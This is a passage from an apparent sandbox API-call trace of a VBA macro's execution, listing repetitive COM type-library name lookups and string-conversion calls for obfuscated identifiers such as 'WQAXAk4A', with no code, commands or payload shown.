(This=0x665bd20) returned 0x6 [0068.857] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.857] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jC1kCUZ", lHashVal=0x109297, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.857] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.857] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.857] IUnknown:Release (This=0x665ba50) returned 0xd [0068.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2bfa, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_jC1kCUZ") returned 15 [0068.857] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jC1kCUZ", lHashVal=0x109297, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x43006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x43006b00000000, pDummy=0x0) returned 0x0 [0068.858] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a611f2 | out: _Dst=0x144ec0) returned 0x0 [0068.858] ITypeComp:RemoteBind (in: This=0x665ba60, szName="WQAXAk4A", lHashVal=0x10a032, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61246, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WQAXAk4A") returned 9 [0068.858] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="WQAXAk4A", lHashVal=0x10a032, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61246, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WQAXAk4A") returned 9 [0068.858] ITypeComp:RemoteBind (in: This=0x665bd30, szName="WQAXAk4A", lHashVal=0x10a032, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WQAXAk4A") returned 0x10a032 [0068.858] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="WQAXAk4A" | out: _Dst="WQAXAk4A") returned 0x0 [0068.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="WQAXAk4A") returned 9 [0068.858] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.858] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="WQAXAk4A", lHashVal=0x10a032, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.858] IUnknown:Release (This=0x665ba50) returned 0xd [0068.858] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.858] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="WQAXAk4A", lHashVal=0x10a032, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.858] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.858] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.858] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="WQAXAk4A", lHashVal=0x10a032, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.858] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.858] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.858] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="WQAXAk4A", lHashVal=0x10a032, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.858] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61246, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WQAXAk4A") returned 9 [0068.859] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="WQAXAk4A", lHashVal=0x10a032, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.859] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.859] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61246 | out: _Dst=0x67c2d40) returned 0x0 [0068.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_WQAXAk4A") returned 0x1077bb [0068.859] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_WQAXAk4A" | out: _Dst="_B_var_WQAXAk4A") returned 0x0 [0068.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_WQAXAk4A") returned 16 [0068.859] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.859] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_WQAXAk4A", lHashVal=0x1077bb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.859] IUnknown:Release (This=0x665ba50) returned 0xd [0068.859] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.859] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_WQAXAk4A", lHashVal=0x1077bb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.859] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.859] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.859] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_WQAXAk4A", lHashVal=0x1077bb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.859] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.859] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.859] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_WQAXAk4A", lHashVal=0x1077bb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.859] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.859] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.859] IUnknown:Release (This=0x665ba50) returned 0xd [0068.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2c2a, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_WQAXAk4A") returned 16 [0068.859] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_WQAXAk4A", lHashVal=0x1077bb, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x41005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x41005800000000, pDummy=0x0) returned 0x0 [0068.859] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61246 | out: _Dst=0x144ec0) returned 0x0 [0068.859] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tBDAoBZQ", lHashVal=0x10c6e0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6121a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="tBDAoBZQ") returned 9 [0068.860] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tBDAoBZQ", lHashVal=0x10c6e0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6121a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="tBDAoBZQ") returned 9 [0068.860] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tBDAoBZQ", lHashVal=0x10c6e0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.860] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tBDAoBZQ") returned 0x10c6e0 [0068.860] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="tBDAoBZQ" | out: _Dst="tBDAoBZQ") returned 0x0 [0068.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="tBDAoBZQ") returned 9 [0068.860] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.860] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="tBDAoBZQ", lHashVal=0x10c6e0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.860] IUnknown:Release (This=0x665ba50) returned 0xd [0068.860] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.860] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="tBDAoBZQ", lHashVal=0x10c6e0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.860] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.860] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.860] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="tBDAoBZQ", lHashVal=0x10c6e0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.860] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.860] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.860] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="tBDAoBZQ", lHashVal=0x10c6e0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.860] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6121a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="tBDAoBZQ") returned 9 [0068.860] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tBDAoBZQ", lHashVal=0x10c6e0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.860] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.860] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a6121a | out: _Dst=0x67c2d40) returned 0x0 [0068.860] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tBDAoBZQ") returned 0x109e69 [0068.860] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_tBDAoBZQ" | out: _Dst="_B_var_tBDAoBZQ") returned 0x0 [0068.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_tBDAoBZQ") returned 16 [0068.860] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.860] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_tBDAoBZQ", lHashVal=0x109e69, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.861] IUnknown:Release (This=0x665ba50) returned 0xd [0068.861] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.861] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_tBDAoBZQ", lHashVal=0x109e69, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.861] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.861] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.861] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_tBDAoBZQ", lHashVal=0x109e69, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.861] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.861] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.861] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_tBDAoBZQ", lHashVal=0x109e69, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.861] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.861] VirtualAlloc (lpAddress=0x3504000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x3504000 [0068.861] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.861] IUnknown:Release (This=0x665ba50) returned 0xd [0068.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2c5a, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_tBDAoBZQ") returned 16 [0068.862] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_tBDAoBZQ", lHashVal=0x109e69, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x6f004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x6f004100000000, pDummy=0x0) returned 0x0 [0068.862] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a6121a | out: _Dst=0x144ec0) returned 0x0 [0068.862] ITypeComp:RemoteBind (in: This=0x665ba60, szName="nAAAxXA", lHashVal=0x1036fd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6129a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nAAAxXA") returned 8 [0068.862] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="nAAAxXA", lHashVal=0x1036fd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6129a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nAAAxXA") returned 8 [0068.862] ITypeComp:RemoteBind (in: This=0x665bd30, szName="nAAAxXA", lHashVal=0x1036fd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.862] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nAAAxXA") returned 0x1036fd [0068.862] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="nAAAxXA" | out: _Dst="nAAAxXA") returned 0x0 [0068.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="nAAAxXA") returned 8 [0068.862] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.862] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="nAAAxXA", lHashVal=0x1036fd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.862] IUnknown:Release (This=0x665ba50) returned 0xd [0068.862] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.862] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="nAAAxXA", lHashVal=0x1036fd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.862] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.862] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.862] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="nAAAxXA", lHashVal=0x1036fd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.862] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.862] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.862] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="nAAAxXA", lHashVal=0x1036fd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.862] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6129a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="nAAAxXA") returned 8 [0068.862] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="nAAAxXA", lHashVal=0x1036fd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.862] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.863] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a6129a | out: _Dst=0x67c2d40) returned 0x0 [0068.863] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_nAAAxXA") returned 0x103a81 [0068.863] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_nAAAxXA" | out: _Dst="_B_var_nAAAxXA") returned 0x0 [0068.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_nAAAxXA") returned 15 [0068.863] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.863] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_nAAAxXA", lHashVal=0x103a81, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.863] IUnknown:Release (This=0x665ba50) returned 0xd [0068.863] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.863] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_nAAAxXA", lHashVal=0x103a81, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.863] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.863] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.863] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_nAAAxXA", lHashVal=0x103a81, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.863] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.863] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.863] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_nAAAxXA", lHashVal=0x103a81, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.863] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.863] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.863] IUnknown:Release (This=0x665ba50) returned 0xd [0068.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2c8a, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_nAAAxXA") returned 15 [0068.863] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_nAAAxXA", lHashVal=0x103a81, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x78004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x78004100000000, pDummy=0x0) returned 0x0 [0068.863] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a6129a | out: _Dst=0x144ec0) returned 0x0 [0068.863] ITypeComp:RemoteBind (in: This=0x665ba60, szName="qccDwDAA", lHashVal=0x101a02, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a612c2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="qccDwDAA") returned 9 [0068.863] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="qccDwDAA", lHashVal=0x101a02, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a612c2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="qccDwDAA") returned 9 [0068.863] ITypeComp:RemoteBind (in: This=0x665bd30, szName="qccDwDAA", lHashVal=0x101a02, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.863] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qccDwDAA") returned 0x101a02 [0068.863] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="qccDwDAA" | out: _Dst="qccDwDAA") returned 0x0 [0068.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="qccDwDAA") returned 9 [0068.864] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.864] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="qccDwDAA", lHashVal=0x101a02, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.864] IUnknown:Release (This=0x665ba50) returned 0xd [0068.864] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.864] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="qccDwDAA", lHashVal=0x101a02, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.864] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.864] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.864] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="qccDwDAA", lHashVal=0x101a02, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.864] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.864] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.864] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="qccDwDAA", lHashVal=0x101a02, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.864] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a612c2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="qccDwDAA") returned 9 [0068.864] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="qccDwDAA", lHashVal=0x101a02, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 